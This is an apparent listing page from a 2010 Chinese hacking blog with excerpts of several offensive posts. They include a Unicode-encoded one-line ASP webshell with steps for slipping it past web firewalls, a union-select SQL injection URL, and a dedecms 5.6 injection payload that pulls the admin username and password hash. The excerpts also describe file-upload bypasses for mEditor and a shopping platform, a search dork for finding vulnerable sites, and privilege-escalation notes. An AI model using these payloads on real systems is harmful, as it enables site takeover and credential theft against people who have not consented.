现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,
比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。
1.新建一个mdb
2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;
(实际是<% execute request(“a”)%>)
3.改后缀为asp/asa
...黑面小窝
欢迎光临小窝,有任何问题请留言反馈。QQ:3768110 本站使用全屏模板,导致你访问框架变形的敬请谅解~
2010年9月2日
通过unicode躲开web防火墙过滤,webshell上传全是空格问题
Tags: web安全 黑客
发布:admin | 分类:技术文章 | 评论:1 | 引用:0 | 浏览:
2010年8月31日
Art2008cms 4.3 的鸡肋漏洞--列目录
FORM WWW.ST999.CN/BLOG
对于前个3.1版本的cookies欺骗漏洞,http://www.st999.cn/blog/?action=show&id=315,本来错误的以为4.1的换成了seesion验证了,结果再次发现,竟然还是cookies验证,只不过是加了个referer验证而已。所以,这个后台欺骗漏洞我也没利用成功,,哪位朋友如果有办法利用的,麻烦到我的blog给我留言下,blog http://www.st999.cn/blog!!!
Tags: 漏洞 web安全
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年8月30日
Adsutil.vbs脚本获取IIS配置信息及账号密码
作者:enjoyhack
今晚在拿站的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。
无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就再帖下,并说明用法!
Tags: web安全 密码 提权
发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
2010年8月5日
PHP5.2.6 (content.phpid) SQL注入漏洞
Sql Injection:
http://www.heimian.com/content.php?id=114
xpl :
http://www.heimian.com/content.php?id=-114+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Tags: php 注入 web安全
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年8月5日
dedecms 5.6 RSS订阅页面注入漏洞
EXP:
uploads/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1
利用环境:
...Tags: 注入 php web安全
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年7月29日
淘宝博士互刷平台联盟上传漏洞
其实这个漏洞就是 动感购物商城 的那个上传问题。
if session(“useridname”)<>”" or session(“AdminName”)<>”" then
这是upload_flash.asp文件对访问的验证,只需要注册个用户就可以上传了。
用明小子直接上传。
找了个关键字,不过可利用的不多:inurl:help/pay_introduce.asp
...Tags: 漏洞 web安全
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年7月29日
meditor 编辑器漏洞
直接说漏洞
http://www.heimian.com/mEditor/Admin/Admin_Setting.asp
网址后面加上mEditor/Admin/Admin_Setting.asp,显示出样式列表
直接点修改样式
上传类型那里修改下,然后预览样式,上传
Tags: web安全 漏洞
发布:admin | 分类:漏洞收集 | 评论:0 | 引用:0 | 浏览:
2010年7月29日
Powered by Discuz7.2我的马甲插件注射漏洞
影响版本:
Powered by Discuz7.2
程序介绍:
Discuz! 一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的论坛服务
漏洞插件:
plugin.php
